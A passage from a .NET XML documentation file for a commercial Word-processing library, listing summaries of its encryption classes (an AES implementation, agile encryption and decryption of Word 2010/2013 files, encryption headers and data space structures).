        <member name="T:Syncfusion.DocIO.ReaderWriter.Security.Aes">
            <summary>
            This class used for implementing Advanced Encryption Standard algorithm.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.Aes.#ctor(Syncfusion.DocIO.ReaderWriter.Security.Aes.KeySize,System.Byte[])">
            <summary>
            Initializes a new instance of the Aes class.
            </summary>
            <param name="keySize">Key size.</param>
            <param name="keyBytes">Key bytes</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.Aes.Initialize">
            <summary>
            Initializes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.Aes.Cipher(System.Byte[],System.Byte[])">
            <summary>
            Encipher 16 bit input
            </summary>
            <param name="input">16 bit Input</param>
            <param name="output">Output value</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.Aes.InvCipher(System.Byte[],System.Byte[])">
            <summary>
             Decipher 16-bit input
            </summary>
            <param name="input"></param>
            <param name="output"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.Aes.SetNbNkNr(Syncfusion.DocIO.ReaderWriter.Security.Aes.KeySize)">
            <summary>
            Sets the nb nk nr.
            </summary>
            <param name="keySize">Size of the key.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.Aes.BuildSbox">
            <summary>
            Builds the sbox.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.Aes.BuildInvSbox">
            <summary>
            Builds the inv sbox.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.Aes.BuildRcon">
            <summary>
            Builds the rcon.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.Aes.AddRoundKey(System.Int32)">
            <summary>
            Adds the round key.
            </summary>
            <param name="round">The round.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.Aes.SubBytes">
            <summary>
            Subs the bytes.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.Aes.InvSubBytes">
            <summary>
            Invs the sub bytes.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.Aes.ShiftRows">
            <summary>
            Shifts the rows.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.Aes.InvShiftRows">
            <summary>
            Invs the shift rows.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.Aes.MixColumns">
            <summary>
            Mixes the columns.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.Aes.InvMixColumns">
            <summary>
            Invs the mix columns.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.Aes.KeyExpansion">
            <summary>
            Keys the expansion.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.Aes.SubWord(System.Byte[])">
            <summary>
            Subs the word.
            </summary>
            <param name="word">The word.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.Aes.RotWord(System.Byte[])">
            <summary>
            Rots the word.
            </summary>
            <param name="word">The word.</param>
            <returns></returns>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Security.Aes.KeySize">
            <summary>
            Possible key sizes.
            key size, in bits, for constructor.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.Aes.KeySize.Bits128">
            <summary>
            128-bit.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.Aes.KeySize.Bits192">
            <summary>
            192-bit.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.Aes.KeySize.Bits256">
            <summary>
            256-bit.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Security.AgileDecryptor">
            <summary>
            This class is responsible for decryption of Agile encryption (Word 2010/2013) files.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.AgileDecryptor.SegmentSize">
            <summary>
            Segment size.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.AgileDecryptor.m_dataSpaceMap">
            <summary>
            Dataspace map.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.AgileDecryptor.m_info">
            <summary>
            Encryption info.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.AgileDecryptor.m_storage">
            <summary>
            Compound storage that should be decrypted.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.AgileDecryptor.m_intermediateKey">
            <summary>
            Intermediate key.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.AgileDecryptor.m_securityHelper">
            <summary>
            Security helper contains utility methods for encryption/decryption.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.AgileDecryptor.m_hashAlgorithm">
            <summary>
            Hashing Algorithm used to compute hash.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.AgileDecryptor.m_hmacSha">
            <summary>
            Computes a Hash-based Message Authentication Code (HMAC) using the System.Security.Cryptography.SHA1 hash function.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.AgileDecryptor.Decrypt">
            <summary>
            Decrypts internal storage.
            </summary>
            <returns>Decrypted stream.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.AgileDecryptor.Initialize(Syncfusion.CompoundFile.DocIO.ICompoundStorage)">
            <summary>
            Prepares decryptor for actual decryption.
            </summary>
            <param name="storage">Compound storage to get required data.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.AgileDecryptor.CheckPassword(System.String)">
            <summary>
            Checks whether password is correct.
            </summary>
            <param name="password">Password to check.</param>
            <returns>True if password verification succeeded.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.AgileDecryptor.CheckEncryptedPackage(System.Byte[])">
            <summary>
            Checks the encrypted package.
            </summary>
            <param name="encryptedPackage">The encrypted package.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.AgileDecryptor.Decrypt(System.Byte[],System.Int32,System.Byte[],System.Byte[],System.Int32)">
            <summary>
            Decrypts the specified data.
            </summary>
            <param name="data">The data.</param>
            <param name="blockSize">Size of the block.</param>
            <param name="arrKey">The arr key.</param>
            <param name="IV">The IV.</param>
            <param name="actualLength">The actual length.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.AgileDecryptor.ParseTransform(Syncfusion.CompoundFile.DocIO.ICompoundStorage)">
            <summary>
            Parses the transform.
            </summary>
            <param name="dataSpaces">The data spaces.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.AgileDecryptor.ParseDataSpaceMap(Syncfusion.CompoundFile.DocIO.ICompoundStorage)">
            <summary>
            Parses the data space map.
            </summary>
            <param name="dataSpaces">The data spaces.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.AgileDecryptor.ParseTransformInfo(Syncfusion.CompoundFile.DocIO.ICompoundStorage)">
            <summary>
            Parses the transform info.
            </summary>
            <param name="transformStorage">The transform storage.</param>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Security.AgileEncryptionInfo">
            <summary>
            Represents the agile encryption info for Encryption/Decryption of Word 2010/2013 documents.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.AgileEncryptionInfo.m_iVersionInfo">
            <summary>
            A Version structure where Version.vMajor MUST be 0x0004, and Version.vMinor MUST be 0x0004.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.AgileEncryptionInfo.m_iReserved">
            <summary>
            A Reserved 4 bytes, MUST be 0x00000040.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.AgileEncryptionInfo.m_xmlEncryptionDescriptor">
            <summary>
            An XmlEncryptionDescriptor structure that specifies encryption and hashing algorithm.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.AgileEncryptionInfo.m_securityHelper">
            <summary>
            Security helper contains utility methods for encryption/decryption.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.AgileEncryptionInfo.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.AgileEncryptionInfo.#ctor(System.IO.Stream)">
            <summary>
            Initializes new instance.
            </summary>
            <param name="stream">Stream to get data from.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.AgileEncryptionInfo.Serialize(System.IO.Stream)">
            <summary>
            Serializes object into stream.
            </summary>
            <param name="stream">Stream to serialize into.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.AgileEncryptionInfo.VersionInfo">
            <summary>
            Gets or sets the version info.
            </summary>
            <value>The version info.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.AgileEncryptionInfo.Reserved">
            <summary>
            Gets or sets the reserved.
            </summary>
            <value>The reserved.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.AgileEncryptionInfo.XmlEncryptionDescriptor">
            <summary>
            An XmlEncryptionDescriptor structure that specifies encryption and hashing algorithm.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Security.AgileEncryptor">
            <summary>
            This class used to encrypt data using Agile encryption (Word 2010/2013).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.AgileEncryptor.DefaultVersion">
            <summary>
            Default version.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.AgileEncryptor.Reserved">
            <summary>
            Reserved bytes.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.AgileEncryptor.SegmentSize">
            <summary>
            Segment size.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.AgileEncryptor.m_securityHelper">
            <summary>
            Security helper contains utility methods for encryption/decryption.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.AgileEncryptor.m_hashAlgorithm">
            <summary>
            Hashing Algorithm used to compute hash.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.AgileEncryptor.m_hmacSha">
            <summary>
            Computes a Hash-based Message Authentication Code (HMAC) using the System.Security.Cryptography.SHA1 hash function.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.AgileEncryptor.m_hashAlgorithmName">
            <summary>
            Hashing Algorithm name used to compute hash.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.AgileEncryptor.m_keyBits">
            <summary>
            Encryption key bits.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.AgileEncryptor.m_hashSize">
            <summary>
            Hash size.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.AgileEncryptor.#ctor">
            <summary>
            Initializes encryptor for agile encryption.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.AgileEncryptor.#ctor(System.String,System.Int32,System.Int32)">
            <summary>
            Initializes encryptor for agile encryption.
            </summary>
            <param name="hashAlgorithm">The hash algorithm.</param>
            <param name="keyBits">The key bits.</param>
            <param name="hashSize">Size of the hash.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.AgileEncryptor.Encrypt(System.IO.Stream,System.String,Syncfusion.CompoundFile.DocIO.ICompoundStorage)">
            <summary>
            Encrypts specified stream.
            </summary>
            <param name="data">Data to encrypt.</param>
            <param name="password">Password to use.</param>
            <param name="root">Root storage to put encrypted data into.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.AgileEncryptor.PrepareEncryptionInfo(System.IO.Stream,Syncfusion.CompoundFile.DocIO.ICompoundStorage,System.String)">
            <summary>
            Prepares the encryption info.
            </summary>
            <param name="data">The data.</param>
            <param name="root">The root.</param>
            <param name="password">The password.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.AgileEncryptor.PrepareEncryptedPackage(System.IO.Stream,Syncfusion.CompoundFile.DocIO.ICompoundStorage,Syncfusion.DocIO.ReaderWriter.Security.KeyData,System.Byte[])">
            <summary>
            Prepares the encrypted package.
            </summary>
            <param name="data">The data.</param>
            <param name="root">The root.</param>
            <param name="keyData">The key data.</param>
            <param name="intermediateKey">The intermediate key.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.AgileEncryptor.InitializeKeyData(Syncfusion.DocIO.ReaderWriter.Security.KeyData)">
            <summary>
            Initializes the key data.
            </summary>
            <param name="keyData">The key data.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.AgileEncryptor.InitializeEncryptedKey(Syncfusion.DocIO.ReaderWriter.Security.EncryptedKey)">
            <summary>
            Initializes the encrypted key.
            </summary>
            <param name="key">The key.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.AgileEncryptor.PrepareDataSpaces(Syncfusion.CompoundFile.DocIO.ICompoundStorage)">
            <summary>
            Preparse data spaces structures inside specified storage.
            </summary>
            <param name="root">Storage to put DataSpaces inside.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.AgileEncryptor.SerializeVersion(Syncfusion.CompoundFile.DocIO.ICompoundStorage)">
            <summary>
            Serializes VersionInfo stream inside specified storage.
            </summary>
            <param name="dataSpaces">Storage to serialize VersionInfo into.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.AgileEncryptor.SerializeTransformInfo(Syncfusion.CompoundFile.DocIO.ICompoundStorage)">
            <summary>
            Serializes transformation info.
            </summary>
            <param name="dataSpaces">Storage to serialize into.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.AgileEncryptor.SerializeDataSpaceInfo(Syncfusion.CompoundFile.DocIO.ICompoundStorage)">
            <summary>
            Serializes dataspace info.
            </summary>
            <param name="dataSpaces">Storage to serialize into.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.AgileEncryptor.SerializeDataSpaceMap(Syncfusion.CompoundFile.DocIO.ICompoundStorage)">
            <summary>
            Serializes DataSpaceMap stream.
            </summary>
            <param name="dataSpaces">Storage to place stream into.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.AgileEncryptor.CreateSalt(System.Int32)">
            <summary>
            Creates the salt.
            </summary>
            <param name="length">The length.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.AgileEncryptor.Encrypt(System.Byte[],System.Int32,System.Byte[],System.Byte[])">
            <summary>
            Encrypts the specified data.
            </summary>
            <param name="data">The data.</param>
            <param name="blockSize">Size of the block.</param>
            <param name="key">The key.</param>
            <param name="IV">The IV.</param>
            <returns></returns>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Security.DataSpaceDefinition">
            <summary>
            Represents the data space definition for Encryption/Decryption of Word documents.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.DataSpaceDefinition.DefaultHeaderLength">
            <summary>
            Default header size.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.DataSpaceDefinition.m_iHeaderLength">
            <summary>
            Header length.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.DataSpaceDefinition.m_lstTransformRefs">
            <summary>
            List with transform references.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.DataSpaceDefinition.m_securityHelper">
            <summary>
            Security helper contains utility methods for encryption/decryption.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.DataSpaceDefinition.#ctor">
            <summary>
            Initializes new instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.DataSpaceDefinition.#ctor(System.IO.Stream)">
            <summary>
            Initializes new instance of DataSpaceDefinition.
            </summary>
            <param name="stream">Stream to get data from.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.DataSpaceDefinition.Serialize(System.IO.Stream)">
            <summary>
            Serializes dataspace definition into the stream.
            </summary>
            <param name="stream">Stream to serialize into.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.DataSpaceDefinition.TransformRefs">
            <summary>
            List with transform references.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Security.DataSpaceMap">
            <summary>
            Represents the data space map for Encryption/Decryption of Word documents.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.DataSpaceMap.m_iHeaderSize">
            <summary>
            Size of the header.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.DataSpaceMap.m_lstMapEntries">
            <summary>
            Map entries.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.DataSpaceMap.m_securityHelper">
            <summary>
            Security helper contains utility methods for encryption/decryption.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.DataSpaceMap.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.DataSpaceMap.#ctor(System.IO.Stream)">
            <summary>
            Initializes new instance of the DataSpaceMap.
            </summary>
            <param name="stream">Stream to get data from.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.DataSpaceMap.Serialize(System.IO.Stream)">
            <summary>
            Serializes dataspace map into the stream.
            </summary>
            <param name="stream">Stream to serialize into.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.DataSpaceMap.MapEntries">
            <summary>
            Map entries.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Security.DataSpaceMapEntry">
            <summary>
            Represents the data space map entry for Encryption/Decryption of Word documents.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.DataSpaceMapEntry.m_lstComponents">
            <summary>
            List of the reference components.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.DataSpaceMapEntry.m_strDataSpaceName">
            <summary>
            DataSpace name.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.DataSpaceMapEntry.m_securityHelper">
            <summary>
            Security helper contains utility methods for encryption/decryption.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.DataSpaceMapEntry.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.DataSpaceMapEntry.#ctor(System.IO.Stream)">
            <summary>
            Initializes new instance of the map entry.
            </summary>
            <param name="stream">Stream to get data from.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.DataSpaceMapEntry.Serialize(System.IO.Stream)">
            <summary>
            Serializes single dataspace map entry into the stream.
            </summary>
            <param name="stream">Stream to serialize into.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.DataSpaceMapEntry.Components">
            <summary>
            List of the reference components.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.DataSpaceMapEntry.DataSpaceName">
            <summary>
            DataSpace name.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Security.DataSpaceReferenceComponent">
            <summary>
            Represents the data space reference component for Encryption/Decryption of Word documents.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.DataSpaceReferenceComponent.m_iComponentType">
            <summary>
            Component type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.DataSpaceReferenceComponent.m_strName">
            <summary>
            Component name.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.DataSpaceReferenceComponent.m_securityHelper">
            <summary>
            Security helper contains utility methods for encryption/decryption.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.DataSpaceReferenceComponent.#ctor(System.Int32,System.String)">
            <summary>
            Initializes new instance of the reference component.
            </summary>
            <param name="type">Component type.</param>
            <param name="name">Component name.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.DataSpaceReferenceComponent.#ctor(System.IO.Stream)">
            <summary>
            Initializes new instance of the component reference.
            </summary>
            <param name="stream">Stream to get data from.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.DataSpaceReferenceComponent.Serialize(System.IO.Stream)">
            <summary>
            Serializes object into stream.
            </summary>
            <param name="stream">Stream to serialize into.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.DataSpaceReferenceComponent.ComponentType">
            <summary>
            Component type.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.DataSpaceReferenceComponent.Name">
            <summary>
            Component name.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Security.DocxProtection">
            <summary>
            This class contains utility methods used by Word 2007 and Word 2010 document protection implementation.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.DocxProtection.SpinCount">
            <summary>
            Specifies number of iterations used for key generation.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.DocxProtection.CryptographicType">
            <summary>
            Specifies the cryptography type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.DocxProtection.CryptographicAlgorithmClass">
            <summary>
            Specifies the cryptographic algorithm class.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.DocxProtection.CryptographicAlgorithmType">
            <summary>
            Specifies the cryptographic algorithm type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.DocxProtection.CryptographicAlgorithmId">
            <summary>
            Specifies the cryptographic algorithm id (SHA1).
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.DocxProtection.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.Security.DocxProtection"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.DocxProtection.ComputeHash(System.Byte[],System.UInt32)">
            <summary>
            Computes the hash.
            </summary>
            <param name="salt">The salt.</param>
            <param name="encryptedPassword">The encrypted password.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.DocxProtection.CombineByteArrays(System.Byte[],System.Byte[])">
            <summary>
            Combines the byte arrays.
            </summary>
            <param name="array1">The array1.</param>
            <param name="array2">The array2.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.DocxProtection.CreateSalt(System.Int32)">
            <summary>
            Creates the salt.
            </summary>
            <param name="length">The length.</param>
            <returns></returns>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Security.EncryptionHeader">
            <summary>
            Represents the encryption header for Encryption/Decryption of Word documents.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.EncryptionHeader.m_iFlags">
            <summary>
            An EncryptionHeaderFlags structure that specifies properties of the encryption algorithm used.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.EncryptionHeader.m_iSizeExtra">
            <summary>
            Reserved, MUST be 0x00000000.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.EncryptionHeader.m_iAlgorithmId">
            <summary>
            A signed integer that specifies the encryption algorithm.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.EncryptionHeader.m_iAlgorithmIdHash">
            <summary>
            A signed integer that specifies the hashing algorithm in concert with the Flags.fExternal bit.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.EncryptionHeader.m_iKeySize">
            <summary>
            An unsigned integer that specifies the number of bits in the encryption key.
            MUST be a multiple of 8.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.EncryptionHeader.m_iProviderType">
            <summary>
            An implementation specified value which corresponds to constants accepted by
            the specified CSP. MUST be compatible with the chosen CSP.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.EncryptionHeader.m_iReserved1">
            <summary>
            Undefined and MUST be ignored.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.EncryptionHeader.m_iReserved2">
            <summary>
            MUST be 0x00000000 and MUST be ignored.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.EncryptionHeader.m_strCSPName">
            <summary>
            A null-terminated Unicode string that specifies the CSP name.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.EncryptionHeader.m_securityHelper">
            <summary>
            Security helper contains utility methods for encryption/decryption.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.EncryptionHeader.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.EncryptionHeader.#ctor(System.IO.Stream)">
            <summary>
            Initializes new instance of the header and extracts its data from the stream.
            </summary>
            <param name="stream">Stream to get data from.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.EncryptionHeader.Parse(System.IO.Stream)">
            <summary>
            Extracts item's data from the specified stream.
            </summary>
            <param name="stream">Stream to get data from.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.EncryptionHeader.Serialize(System.IO.Stream)">
            <summary>
            Serialize item in the specified stream.
            </summary>
            <param name="stream">Stream to serialize data into.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.EncryptionHeader.Flags">
            <summary>
            An EncryptionHeaderFlags structure that specifies properties of the encryption algorithm used.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.EncryptionHeader.SizeExtra">
            <summary>
            Reserved, MUST be 0x00000000.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.EncryptionHeader.AlgorithmId">
            <summary>
            A signed integer that specifies the encryption algorithm.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.EncryptionHeader.AlgorithmIdHash">
            <summary>
            A signed integer that specifies the hashing algorithm in concert with the Flags.fExternal bit.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.EncryptionHeader.KeySize">
            <summary>
            An unsigned integer that specifies the number of bits in the encryption key.
            MUST be a multiple of 8.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.EncryptionHeader.ProviderType">
            <summary>
            An implementation specified value which corresponds to constants accepted by
            the specified CSP. MUST be compatible with the chosen CSP.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.EncryptionHeader.Reserved1">
            <summary>
            Undefined and MUST be ignored.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.EncryptionHeader.Reserved2">
            <summary>
            MUST be 0x00000000 and MUST be ignored.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.EncryptionHeader.CSPName">
            <summary>
            A null-terminated Unicode string that specifies the CSP name.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Security.EncryptionTransformInfo">
            <summary>
            Represents the encryption transform info for Encryption/Decryption of Word documents.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.EncryptionTransformInfo.m_strName">
            <summary>
            Transform name.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.EncryptionTransformInfo.m_iBlockSize">
            <summary>
            Block size.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.EncryptionTransformInfo.m_iCipherMode">
            <summary>
            Cipher mode.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.EncryptionTransformInfo.m_iReserved">
            <summary>
            Reserved.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.EncryptionTransformInfo.m_securityHelper">
            <summary>
            Security helper contains utility methods for encryption/decryption.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.EncryptionTransformInfo.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.EncryptionTransformInfo.#ctor(System.IO.Stream)">
            <summary>
            Initializes new instance of the class.
            </summary>
            <param name="stream">Stream to get data from.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.EncryptionTransformInfo.Serialize(System.IO.Stream)">
            <summary>
            Serializes object into stream.
            </summary>
            <param name="stream">Stream.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.EncryptionTransformInfo.Name">
            <summary>
            Transform name.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.EncryptionTransformInfo.BlockSize">
            <summary>
            Block size.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.EncryptionTransformInfo.CipherMode">
            <summary>
            Cipher mode.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.EncryptionTransformInfo.Reserved">
            <summary>
            Reserved.
            </summary>
        </member>
